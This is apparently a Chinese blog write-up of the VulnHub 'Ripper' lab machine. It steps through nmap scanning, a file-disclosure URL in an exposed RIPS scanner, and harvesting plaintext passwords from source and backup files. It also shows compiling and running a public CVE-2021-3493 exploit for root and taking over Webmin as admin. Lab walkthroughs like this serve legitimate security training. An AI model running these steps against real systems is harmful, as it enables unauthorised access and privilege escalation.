首页 > 其他分享 >第十七次打靶

第十七次打靶

时间:2023-02-16 15:12:04浏览次数:55  
标签:第十七次 打靶 192.168 3493 rips 2021 靶机 56.125

靶机介绍

1)靶机地址:https://download.vulnhub.com/ripper/Ripper.ova

2)靶机难度:低→中

3)打靶目标: 取得 root 权限 + 2 Flag

4)涉及攻击方法:主机发现、端口扫描、WEB信息搜索、内部系统泄漏、代码审计、备份文件泄密、Webmin漏洞利用、Metasploit、CVE-2021-3493

5)靶机简介:本次来打靶一台中低难度的靶机,其中不包含任何高难度的漏洞,要攻破它主要依靠信息收集。很多企业由于权限管理不当,会误将内部应用发布到公网之上,甚至可能连最基本的身份认证都不需要就可以直接访问。对于该靶机,不需要暴力破解,即可搜索发现内网代码审计平台的入口,进而自动审计目标应用的代码漏洞,并最终实现突破边界。提权阶段,我们仍然依靠信息收集手段登录Webmin平台,并利用其自身功能获取目标系统的最高权限。

打靶过程

1)主机发现

# arp-scan --interface=eth1 --localnet

2)全端口扫描

# nmap -p- 192.168.56.125

3)服务版本扫描

# nmap -p22,80,10000 -sC -sV  192.168.56.125

webmin是一个基于web界面可以对服务器操作系统进行远程管理的web应用

4)访问靶机的80端口和10000端口上的应用

①先访问http://192.168.56.125返回的只是一个apache的起始页面,同时访问http://192.168.56.125/robots.txt显示不存在

②访问http://192.168.56.125:10000/,显示web服务是使用的ssl协议,因此通过https进行访问

http://192.168.56.125:10000/
https://192.168.56.125:10000/

如果可以使用用户名和密码登录至该系统,就可打开一个类似ssh的终端用于管理服务器操作系统,尝试多个弱口令都未能登陆至目标系统

5)通过尝试发现,在10000端口的web服务中存在robots.txt文件

http://192.168.56.125:10000/robots.txt

通过访问robots.txt文件,发现了一串base64编码后的字符,对其进行解码

# echo "d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==" |base64 -d

根据解码后的内容可知:可以使用rips扫描php代码。rips是一个静态的PHP源码分析软件

RIPS官网:https://rips-scanner.sourceforge.net/

6)尝试在目标靶机的80端口和10000端口分别查看是否存在rips的web应用,发现在80端口上存在rips

https://192.168.56.125:10000/rips     #404
http://192.168.56.125/rips        

7)使用rips对目标服务器上的站点进行漏洞扫描,勾选subdir表示同时对/var/www下的任何目录下的php文件都进行漏洞检测

搜索发现多个文件泄露的漏洞,可以进行简单利用,读取源码

http://192.168.56.125/rips/windows/code.php?file=/var/www/html/rips/windows/code.php

8)通过使用rips在所有的php文件检索pass,检索到一个用户名 ripper和密码Gamespeopleplay

9)尝试使用用户名 ripper和密码Gamespeopleplay登录webmin失败,尝试通过ssh登录成功

# ssh [email protected]

10)信息搜集:查看操作系统内核版本及系统版本,发现使用的是ubuntu18.04版本,根据之前打靶可知,该版本的操作系统存在CVE-2021-3493漏洞

$ uname -a
$ lsb_release -a

11)z使用CVE-2021-3493进行提权

kali:
CVE-2021-3493下载地址:https://github.com//briskets//CVE-2021-3493
# unzip CVE-2021-3493-main.zip
# rm -rf CVE-2021-3493-main.zip
# cd CVE-2021-3493-main
# gcc -o exp exploit.c
# scp exp [email protected]:~

12)直接使用漏洞利用代码进行提权,获取flag

$ ./exp

注:靶机是在2021年6月份发布,但是CVE-2021-3493是在2021年9月份公布的,所以在靶机作者在发布靶机时,该漏洞还没有公布,所以次靶机还有其他的提权方式

13)按照第九步的,通过用户名 ripper和密码Gamespeopleplay使用ssh服务登陆只目标系统后,可在自己的家目录下获取到第一个flag文件

14)在/home目录下,除了ripper用户外,还存在一个cubes用户。

找出在操作系统中属主为cubes用户的文件,同时该文件允许ripper可以读取或者执行,进而通过这些文件可以提权至cubes用户

$ find / -user cubes -type f -exec ls -la {} \; 2>/dev/null

通过查找发现,存在一个secret.file文件,该文件中包含一个密码Il00tpeople

15)尝试通过用户名cubes和密码Il00tpeople登录web系统或者使用ssh协议登录。发现通过ssh可成功登入目标系统

# ssh [email protected]

16)登入系统后,通用查看当前系统中属主为cubes的文件过滤出来

$ find / -user cubes -type f -exec ls -la {} \; 2>/dev/null |grep -v "proc" |grep -v ".png"

在/var/webmin/backup/miniser.log文件中存在一个用户名admin和密码tokiohotel

$ cat /var/webmin/backup/miniser.log

17)尝试通过用户名admin和密码tokiohotel登录webmin应用程序,发现可成功登录

18)打开webmin应用的命令行管理界面,发现权限为root权限,可直接获取到flag

19)获取到webmin的用户名和密码后,也可使用MSF获取到目标靶机的shell

# searchsploit webmin

标签:第十七次,打靶,192.168,3493,rips,2021,靶机,56.125
From: https://www.cnblogs.com/piaolaipiaoqu/p/17126826.html

相关文章

  • 第十六次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/harrypotter/Nagini.ova2)靶机难度:中→高(打点较难)3)打靶目标:取得root权限+3Flag4)涉及攻击方法:主机发现、端口扫......
  • 第十五次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova2)靶机难度:中3)打靶目标:取得两台靶机root权限+Flag4)涉及攻击方法:主机发现、端......
  • 第十二次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip2)靶机难度:中3)打靶目标:取得root权限+Flag4)涉及攻击方法:主机发现、端口扫描、WEB......
  • 第十二次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/vikings/Vikings.ova2)靶机难度:低(中)3)打靶目标:取得root权限+2Flag4)涉及攻击方法:主机发现、端口扫描、WEB信息收......
  • 第十次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova2)靶机难度:中3)打靶目标:取得root权限4)涉及攻击方法:主机发现、端口扫描、WEB信息......
  • 第九次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova2)靶机难度:低→中3)打靶目标:取得root权限+2Flag4)涉及攻击方法:主机发现、网络扫描、......
  • 第八次打靶-2
    靶机介绍1)靶机地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova2)靶机难度:高3)打靶目标:取得root权限4)涉及攻击方法:主机发现、端口扫描、SQL注入......
  • 第七次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z2)靶机难度:中3)打靶目标:取得2个flag+root权限4)涉及攻击方法:主机发现、端口扫描、WEB路径爆破......
  • 第四次打靶
    靶机说明1)靶机地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/2)难度:中等3)虚拟机软件推荐:virtualBox4)本次涉及攻击手段:主机发现、端口扫描、......
  • 第三次打靶
    靶机介绍1)靶机名称:3-Free-MoriartyCorp2)难度级别:中-高3)靶机背景介绍:①你作为一名特工,协助调查世界最大军火商的非法交易②本次靶机共有6个任务,每完成一个任务并提交fl......